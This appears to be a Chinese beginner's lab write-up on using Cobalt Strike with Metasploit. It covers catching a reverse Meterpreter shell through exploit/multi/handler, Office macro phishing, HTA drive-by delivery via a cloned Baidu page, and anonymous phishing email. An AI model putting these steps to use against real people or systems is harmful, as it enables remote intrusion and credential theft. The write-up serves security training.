结合metasploit,反弹shell
1、 启动服务端:(test 为待会靶机连接服务器的密码) (./teamserver 192.168.1.100 test)

2、 客户端连接服务器 运行:cobalstrike.bat

3、 客户端(添加2个监听器)

4、 生成木马并在靶机上运行



5、 反弹型,点击木马,靶机上线。

6、 Msf配置
使用exploit/multi/handler模块(use exploit/multi/handler )
设置payload( set payload windows/meterpreter/reverse_tcp)
设置lhost,lport,运行run -j


7、 派生会话 msf监听选choose

8、 进入会话1(sessions -i 1)执行成功

9、 进入对方shell


实验二、完成office宏钓鱼
1、 生成office码

2、 重启office 码上线

3、 重启office 码上线成功

实验三、完成hta网页挂马
1、 生成hta监听

2、 创建木马 powershell比较稳定


3、 钓鱼攻击→文件下载然后配置


4、 evil.hta文件会自动传到cs uploads目录。

5、 克隆网站


6、伪造百度钓鱼网站登录成功(伪造的ip打开是百度假设木马网站)

实验四、钓鱼邮件
1、cs端攻击→邮件钓鱼

2、下载邮件模板

3、模板删除内容:收发信息、日期。生成222.txt加入到第二个选项



4、触发文件

5、配置邮件客户端,设置stmp。手机发送“配置邮件客户端”



6、 填写好发送

7、 点击发送,匿名发送成功

技术小白还在路上,欢迎各路大神批评指正!~
网友评论